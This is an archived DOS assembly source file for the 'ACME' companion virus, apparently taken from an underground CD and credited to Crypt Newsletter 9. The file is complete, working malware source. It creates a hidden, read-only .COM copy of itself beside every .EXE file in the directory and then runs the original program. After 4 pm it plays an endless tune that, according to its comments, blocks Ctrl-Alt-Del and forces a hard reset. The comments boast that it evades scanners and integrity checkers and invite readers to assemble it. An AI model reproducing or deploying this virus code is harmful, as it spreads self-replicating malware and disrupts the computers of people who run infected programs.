home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / zrodla / a / acme.asm next >
Encoding:
Assembly Source File  |  1998-01-14  |  10.8 KB  |  301 lines
  1. ; ACME COMPANION VIRUS for Crypt Newsletter 9
  2. ;
  3. ; ACME is a fast and simple companion virus which will create a
  4. ; spawned copy of itself for EVERY .EXE file it can find in the
  5. ; current directory. 
  6. ;
  7. ; ACME is ready to assemble using A86. If you recall, an earlier Crypt
  8. ; letter included an A86-only source listing. (Strict TASM/MASM compatible 
  9. ; assemblers will need the manual addition of a couple simple declarative 
  10. ; statements.) I included ACME in this form so fans of Isaacson's 
  11. ; technique can gloat about the code not requiring "red tape." ;-]
  12. ; A86 will assemble ACME directly to a .COMfile virus, no linker
  13. ; necessary.
  15. ; ACME currently eludes all scanners and as a companion virus, openly
  16. ; defies every integrity checker I have in my inventory with the EXCEPTION
  17. ; of Stiller Research's.  This issue includes a quality report on
  18. ; Solomon's Toolkit, so it's only fair to state that while the documentation
  19. ; for this product seems to indicate that the developers know what a 
  20. ; companion infection is, the software does nothing to protect against
  21. ; it in default mode. ACME flies through the Toolkit, for now. Go figure.
  22. ;
  23. ; ACME will also play a generic ACME-style virus tune late in the
  24. ; afternoon. Those who fancy a musical virus but have never heard one are
  25. ; encouraged to play with ACME. Set your system clock to anytime after
  26. ; 4:00 pm. The musical payload takes up most of the space in this virus,
  27. ; removing it shaves the virus to 242 bytes - nice and small if you like.
  28. ;
  29. ; The virus purist may recognize the root of ACME as a piece of code known
  30. ; as ZENO - a small, single-step companion infector. ZENO's author is
  31. ; thanked, wherever he/she is.
  32.  
  33.  
  34. START:          
  35.  
  36.         jmp  VIR_BEGIN    ; get going
  37.  
  38.  
  39. WILDCARD        DB  "*.EXE",0
  40. FILE_EXT        DB  "COM",0
  41. FILE_FOUND      DB  12 DUP(' '), 0
  42. FILE_CREATE     DB  12 DUP(' '), 0
  43. SEARCH_ATTRIB   DW  17H
  44. NUM_INFECT      DW  0
  45. MUZIK           DW      4304,0006, 4063,0006, 4304,0006, 4063,0006, ;MUZIK - notes/delay
  46.         DW      3043,0006, 4831,0006, 4063,0006, 3043,0006, ;in format xxxx,yyyy
  47.         DW      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  48.         DW      3043,0006, 4831,0006, 4063,0006, 3043,0006, 
  49.         DW      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  50.         DW      3043,0006, 4831,0006, 4063,0006, 3043,0006, 
  51.         DW      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  52.         DW      3043,0006, 5119,0006, 5423,0006, 3043,0006, 
  53.         DW      6087,0020, 
  54.  
  55.         DW      6087,0006, 
  56.         DW      7239,0006, 3619,0006, 4831,0006, 6087,0006
  57.         DW      7670,0006, 7239,0006, 4831,0006, 3619,0006
  58.  
  59.         DW      6087,0006, 4063,0006, 3043,0006, 5119,0006
  60.         DW      4831,0006, 6087,0006, 7239,0006, 8126,0006
  61.         DW      6087,0020, 
  62.  
  63.         DW      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  64.         DW      3043,0006, 4831,0006, 4063,0006, 3043,0006, 
  65.         DW      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  66.         DW      3043,0006, 4831,0006, 4063,0006, 3043,0006, 
  67.         DW      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  68.         DW      3043,0006, 5119,0006, 5423,0006, 3043,0006, 
  69.         DW      6087,0020, 
  70.  
  71.         DW      6087,0006, 
  72.         DW      7239,0006, 3619,0006, 4831,0006, 6087,0006
  73.         DW      7670,0006, 7239,0006, 4831,0006, 3619,0006
  74.  
  75.         DW      6087,0006, 4063,0006, 3043,0006, 5119,0006
  76.         DW      4831,0006, 6087,0006, 7239,0006, 8126,0006
  77.         DW      6087,0020, 
  78.  
  79.         DW      7670,0006, 7239,0006, 4831,0006, 3619,0006
  80.         DW      3043,0006, 3619,0006, 4831,0006, 6087,0006
  81.         DW      3043,0010, 
  82.  
  83.         DW      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  84.         DW      3043,0006, 4831,0006, 4063,0006, 3043,0006, 
  85.         DW      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  86.         DW      3043,0006, 4831,0006, 4063,0006, 3043,0006, 
  87.         DW      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  88.         DW      3043,0006, 5119,0006, 5423,0006, 3043,0006, 
  89.         DW      6087,0020, 
  90.  
  91.         DW      7670,0006, 7239,0006, 4831,0006, 3619,0006
  92.         DW      3043,0006, 3619,0006, 4831,0006, 6087,0006
  93.         DW      3043,0010, 
  94.  
  95.         DW      6087,0006, 
  96.         DW      7239,0006, 3619,0006, 4831,0006, 6087,0006
  97.         DW      7670,0006, 7239,0006, 4831,0006, 3619,0006
  98.  
  99.         DW      6087,0006, 4063,0006, 3043,0006, 5119,0006
  100.         DW      4831,0006, 6087,0006, 7239,0006, 8126,0006
  101.         DW      6087,0020, 
  102.  
  103.         DW      0ffffh
  104.  
  105.  
  106.  
  107. My_Cmd:
  108. CMD_LEN         DB  13
  109. FILE_CLONE      DB  12 DUP (' '), 0
  110.  
  111. ;------------------------------------------------------------------;
  112. Prepare_command:
  113.            cld
  114.            mov    di,OFFSET FILE_CLONE
  115.            mov    al,0
  116.            mov    cx,12
  117.            repne scasb          ; find the end of string \0
  118.  
  119.            mov    al,0Dh        ; <CR>
  120.            stosb                ; replace \0 with a <CR>
  121.  
  122.            mov    ax,12         ;store length of the command
  123.            sub    ax,cx
  124.            mov    CMD_LEN, al
  125.            ret
  126.  
  127. ;------------------------------------------------------------------;
  128. Store_name:
  129.  
  130.            mov    di,OFFSET FILE_FOUND   ;Point to buffer.
  131.            mov    si,158                 ;stow the file found in buffer
  132.            mov    cx,12
  133.            rep movsb
  134.  
  135.            mov    di,OFFSET FILE_CREATE  ;Point to buffer.
  136.            mov    si,158
  137.            mov    cx,12
  138.            rep movsb
  139.  
  140.            cld
  141.            mov    di,OFFSET FILE_CREATE
  142.            mov    al,'.'
  143.            mov    cx,9
  144.            repne scasb                   ;find the '.'
  145.  
  146.            mov    si,OFFSET FILE_EXT
  147.            mov    cx,3
  148.            rep movsb                     ;replace the .EXE with .COM
  149.                          ;from buffer
  150.            ret
  151.  
  152.  
  153. ;------------------------------------------------------------------;
  154.                       ;Does the file exist?
  155.  
  156. Check_file:
  157.            mov    dx,OFFSET FILE_CREATE
  158.            mov    cx,0
  159.            mov    ax,3d00h        ; Open file, read only
  160.            int    21h
  161.  
  162. Chk_done:
  163.            ret
  164.  
  165. ;------------------------------------------------------------------;
  166. Infect_file:                                  ;create companion routine
  167.                           
  168.            mov    dx,OFFSET FILE_CREATE   ;contains name of "companion"
  169.            mov    cx,0
  170.            mov    ah,3ch                  ;construct file
  171.            int    21h
  172.            jc     EXIT
  173.  
  174.                           ;Write virus to companion file
  175.            mov    bx,ax
  176.            mov    cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length
  177.            mov    dx,OFFSET START
  178.            mov    ah,40h                  ;write to file function
  179.            int    21h                     ;do it
  180.  
  181.                           ;Close file
  182.            mov    ah,3eh    ; ASSUMES bx still has file handle
  183.            int    21h
  184.  
  185.                           ;Change attributes
  186.            mov    dx,OFFSET FILE_CREATE   ;of created file to
  187.            mov    cx,3          ;(1) read only and (2) hidden
  188.            mov    ax,4301h
  189.            int    21h
  190.  
  191.            ret
  192.  
  193. ;------------------------------------------------------------------
  194. ; Read all the directory filenames and store as records in buffer. 
  195. ;------------------------------------------------------------------
  196.  
  197. Vir_begin:
  198.            mov     ah,02Ch          ;DOS get time function
  199.            int     021h
  200.            mov     al,ch            ;Copy hour into AL
  201.            cbw                      ;Sign-extend AL into AX
  202.            cmp     ax,0010h         ;Did the function return 16 (4 pm)?
  203.            jge     TOON             ;If greater than or equal, muzik!
  204.            
  205.            
  206.            mov    sp,offset STACK_HERE   ;move stack down
  207.            mov    bx,sp
  208.            add    bx,15
  209.            mov    cl,4
  210.            shr    bx,cl
  211.            mov    ah,4ah                  ;deallocate rest of memory
  212.            int    21h
  213.  
  214.            mov    di,OFFSET FILE_CLONE   ;Point to buffer.
  215.            mov    si,OFFSET FILE_FOUND
  216.            mov    cx,12
  217.            rep    movsb
  218.  
  219. Read_dir:      mov    dx,OFFSET WILDCARD   ;file mask for directory search
  220.            mov    cx,SEARCH_ATTRIB
  221.  
  222.            mov    ah,4Eh                ;find the first matching file
  223.            int    21h
  224.  
  225.            jc     EXIT                   ;If empty directory, exit
  226.  
  227. Do_file:
  228.            call   STORE_NAME
  229.            call   CHECK_FILE
  230.            call   INFECT_FILE
  231.  
  232.  
  233.  
  234. Find_next:
  235.            mov   ah,4fh          ; find next file and keep finding until
  236.            int   21h             ; all 
  237.            jnz   Do_File         ; infected
  238.  
  239. Exit:
  240.  
  241.                       ; Run the original program
  242.            call   Prepare_command
  243.            mov    si, OFFSET MY_CMD
  244.            int    2Eh                 ; Pass command to command
  245.                       ; interpreter for execution
  246.                       
  247.            mov    ax,4C00H            ; Exit to DOS
  248.            int    21h
  249.  
  250. ;-------------------------------------------------------------------
  251. ;This routine enables ACME virus to compel the pc to play the 
  252. ;ACME virus song just about the time the clock-watchers are getting
  253. ;ready to leave
  254. ;-------------------------------------------------------------------
  255. TOON:
  256.            cli                        ;interrupts off
  257.            mov     al,10110110xb      ;the number
  258.            out     43h,al             ;to send to the speaker
  259.            lea     si,MUZIK           ;point (si) to the ACME note table
  260.  
  261. TOON2:         cld                        
  262.            lodsw                    ;load word into ax and increment (si)
  263.            cmp     ax,0ffffh        ;is it ffff? If so, end of table
  264.            jz      GO_MUZIK2        ;so, time to jump into endless loop
  265.            out     42h,al           
  266.            mov     al,ah            
  267.            out     42h,al           ;send it next
  268.            in      al,61h           ;get value to turn on speaker
  269.            or      al,00000011xb    ;OR the gotten value
  270.            out     61h,al           ;now we turn on speaker
  271.            lodsw                    ;load the repeat loop count into (ax)
  272. LOOP6:  
  273.         mov     cx,8000         ;delay count
  274. LOOP7:  
  275.         loop    LOOP7           ;do the delay
  276.         dec     ax              ;decrement repeat count
  277.         jnz     LOOP6           ;if not = 0 loop back
  278.         in      al,61h          ;all done
  279.         and     al,11111100xb   ;number turns speaker off
  280.         out     61h,al          ;send it
  281.         jmp     short TOON2     ;now go do next note
  282. GO_MUZIK2:                              ;our loop point
  283.     
  284.         sti                  ;enable interrupts
  285.         jmp    TOON          ;jump back to beginning - this code
  286.                      ; has the additional advantage of
  287.                      ;locking out CTRL-ALT-DEL reboot.
  288.             ;The user must do a hard reset to recover from ACME.
  289.  
  290.  
  291.  
  292. END_OF_CODE     =       $
  293.  
  294. STACK_HERE      EQU   END_OF_CODE + 512
  295.  
  296.  
  297. ;  ─────────────────────────────────────────────────────────────────────────
  298. ;  ────────────────────> and Remember Don't Forget to Call <────────────────
  299. ;  ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────
  300. ;  ─────────────────────────────────────────────────────────────────────────
  301.